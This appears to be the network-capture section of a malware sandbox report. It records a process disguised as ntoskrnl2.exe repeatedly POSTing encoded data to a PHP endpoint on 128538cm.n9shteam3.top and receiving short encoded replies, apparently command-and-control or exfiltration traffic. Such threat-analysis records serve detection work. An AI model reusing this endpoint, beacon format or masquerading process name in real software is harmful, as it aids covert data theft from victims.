                                                            Sep 2, 2024 13:34:36.462373972 CEST | 1324 | OUT | Data Raw: 55 54 5a 51 5b 45 59 53 5b 5f 56 5a 57 5d 50 58 55 5b 5e 43 50 5c 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UTZQ[EYS[_VZW]PXU[^CP\Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$&!:=88'%X$-.Y>-8Z; Y3*<80W)()W=.*%^./]+
                                                            Sep 2, 2024 13:34:36.764698982 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:36.889368057 CEST | 308 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:36 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 53 34 0a 02 0f 31 15 09 02 3d 07 04 58 28 13 28 44 2e 59 24 58 33 07 0e 02 28 1c 2e 0b 25 39 3d 5c 3e 02 29 5a 3f 0c 00 0d 22 24 20 5b 03 1f 26 04 34 0c 0f 09 25 5e 31 1f 27 0e 22 58 35 34 2f 06 28 3e 36 52 33 3e 3f 00 21 31 2e 55 38 04 3e 57 31 3b 2b 06 39 3f 3e 58 31 04 2a 56 08 16 3b 0e 3f 3c 3a 15 37 27 3f 1f 37 5e 26 0d 37 25 27 52 24 30 37 1e 27 5c 32 0f 27 2e 06 0f 3d 2d 34 01 30 00 39 14 21 23 21 52 2c 29 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: S41=X((D.Y$X3(.%9=\>)Z?"$ [&4%^1'"X54/(>6R3>?!1.U8>W1;+9?>X1*V;?<:7'?7^&7%'R$07'\2'.=-409!#!R,)$P.-V0WS


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            57 | 192.168.2.6 | 49804 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:36.119716883 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:36.477982044 CEST | 1028 | OUT | Data Raw: 50 53 5a 54 5e 44 5c 50 5b 5f 56 5a 57 5c 50 5f 55 5b 5e 43 50 5d 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PSZT^D\P[_VZW\P_U[^CP]Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$&1!X(+#39^3>9<;; Z$<:++;=(Z)6:*%^./]+,
                                                            Sep 2, 2024 13:34:36.783283949 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:36.909029961 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:36 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            58 | 192.168.2.6 | 49805 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:37.046052933 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:37.402683973 CEST | 1028 | OUT | Data Raw: 50 56 5a 57 5e 45 59 51 5b 5f 56 5a 57 5b 50 5e 55 59 5e 43 50 5e 5a 50 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PVZW^EYQ[_VZW[P^UY^CP^ZPYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$2&=8'"0Y<Z,$]',(8V)$+*%-:%^./]+0
                                                            Sep 2, 2024 13:34:37.696208000 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:37.822103024 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            59 | 192.168.2.6 | 49806 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:37.959026098 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:38.306097984 CEST | 1028 | OUT | Data Raw: 50 56 5a 53 5e 46 59 54 5b 5f 56 5a 57 5c 50 5d 55 5a 5e 45 50 59 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PVZS^FYT[_VZW\P]UZ^EPYZ_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'019Y<8/]$"3X->=8]8$83,!T(;*B8>!:\.:%^./]+,
                                                            Sep 2, 2024 13:34:38.677062988 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:38.725670099 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            60 | 192.168.2.6 | 49807 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:38.901597977 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:39.260658026 CEST | 1028 | OUT | Data Raw: 55 57 5f 54 5b 41 59 53 5b 5f 56 5a 57 5c 50 53 55 5e 5e 45 50 5f 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UW_T[AYS[_VZW\PSU^^EP_Z^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3!+8%!9_$>%?7;B;0%R+'=';=!-9%^./]+,
                                                            Sep 2, 2024 13:34:39.569981098 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:39.697087049 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            61 | 192.168.2.6 | 49808 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:39.855004072 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:40.218219042 CEST | 1028 | OUT | Data Raw: 50 51 5f 53 5e 42 5c 50 5b 5f 56 5a 57 59 50 5b 55 5f 5e 49 50 53 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PQ_S^B\P[_VZWYP[U_^IPSZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'01!^(+X31)%.(#;0]'%?+?=0>:9%^./]+8
                                                            Sep 2, 2024 13:34:40.522284985 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:40.651228905 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:39 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            62 | 192.168.2.6 | 49809 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:40.972548008 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:41.324354887 CEST | 1028 | OUT | Data Raw: 50 56 5f 54 5e 47 5c 50 5b 5f 56 5a 57 55 50 5e 55 59 5e 46 50 5c 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PV_T^G\P[_VZWUP^UY^FP\ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Y3">=8;$2*'.?-[;$3<>?+8*<)W=/:%^./]+
                                                            Sep 2, 2024 13:34:41.636584044 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:41.762834072 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:41 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            63 | 192.168.2.6 | 49810 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:41.892365932 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:42.247843027 CEST | 1028 | OUT | Data Raw: 55 5e 5a 5e 5b 44 5c 50 5b 5f 56 5a 57 59 50 5a 55 5d 5e 42 50 59 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^Z^[D\P[_VZWYPZU]^BPYZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''=_?8#0"60.Y<=,,4$<!W(+,)*15-*%^./]+8
                                                            Sep 2, 2024 13:34:42.562072992 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:42.694101095 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:41 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            64 | 192.168.2.6 | 49811 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:41.933526993 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:42.319852114 CEST | 1340 | OUT | Data Raw: 55 57 5a 5e 5e 49 59 56 5b 5f 56 5a 57 5a 50 5e 55 51 5e 46 50 5e 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UWZ^^IYV[_VZWZP^UQ^FP^ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'['9]?+;02%Z'.">=,;'/!R< >')/:%^./]+
                                                            Sep 2, 2024 13:34:42.582245111 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:42.800107956 CEST | 308 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 23 0e 23 1a 23 56 26 15 2c 5e 2b 2a 35 06 3f 3d 34 43 2d 11 0d 03 30 3a 3f 5f 28 54 2d 1a 25 07 35 5c 29 2c 08 02 2b 0b 2d 55 21 24 20 5b 03 1f 25 5c 23 31 25 0f 25 2b 3a 00 27 37 2e 1b 35 37 0d 07 2a 04 25 0a 25 3e 3b 01 23 57 31 09 2f 3e 21 08 25 2b 20 59 3a 2f 2a 1b 24 2e 2a 56 08 16 38 1d 28 12 04 5f 20 0e 3c 01 23 28 3a 0f 20 40 24 0f 30 33 20 0e 27 39 39 53 25 2d 38 0e 28 2d 02 07 24 00 39 5b 37 33 39 52 3a 13 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: ###V&,^+*5?=4C-0:?_(T-%5\),+-U!$ [%\#1%%+:'7.57*%%>;#W1/>!%+ Y:/*$.*V8(_ <#(: @$03 '99S%-8(-$9[739R:$P.-V0WS


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            65 | 192.168.2.6 | 49812 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:42.855070114 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:43.212337971 CEST1028OUTData Raw: 55 55 5a 50 5b 42 5c 57 5b 5f 56 5a 57 5f 50 59 55 51 5e 49 50 59 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UUZP[B\W[_VZW_PYUQ^IPYZ]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'^0<_'T)0)<-$^,4$0!S+$T)$(_>99%^./]+
                                                            Sep 2, 2024 13:34:43.511909962 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:43.727143049 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            66 | 192.168.2.6 | 49813 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:43.870357990 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:44.228072882 CEST1028OUTData Raw: 50 53 5a 50 5e 40 5c 51 5b 5f 56 5a 57 54 50 58 55 5f 5e 42 50 53 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PSZP^@\Q[_VZWTPXU_^BPSZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'&!>=8/$:%-5(>8;B8'V*; W)B7)5/:%^./]+
                                                            Sep 2, 2024 13:34:44.639075041 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:44.639733076 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            67 | 192.168.2.6 | 49814 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:44.779737949 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:45.134491920 CEST1024OUTData Raw: 55 57 5a 52 5e 43 59 5d 5b 5f 56 5a 57 5d 50 5d 55 59 5e 46 50 59 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UWZR^CY][_VZW]P]UY^FPYZ\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'09(4$T='\+#, 3,)S(8(7()&9:%^./]+
                                                            Sep 2, 2024 13:34:45.424245119 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:45.549455881 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            68 | 192.168.2.6 | 49815 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:45.715205908 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:46.071882010 CEST1028OUTData Raw: 55 54 5a 50 5b 42 5c 51 5b 5f 56 5a 57 58 50 53 55 58 5e 40 50 5f 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UTZP[B\Q[_VZWXPSUX^@P_Z\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Z'9+'^$%$>:]?.<\/$0>?+,V)$?!^.%^./]+<
                                                            Sep 2, 2024 13:34:46.379530907 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:46.508801937 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:45 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            69 | 192.168.2.6 | 49816 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:46.641783953 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:46.993664980 CEST1028OUTData Raw: 50 55 5f 55 5b 45 59 57 5b 5f 56 5a 57 55 50 58 55 59 5e 40 50 5d 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
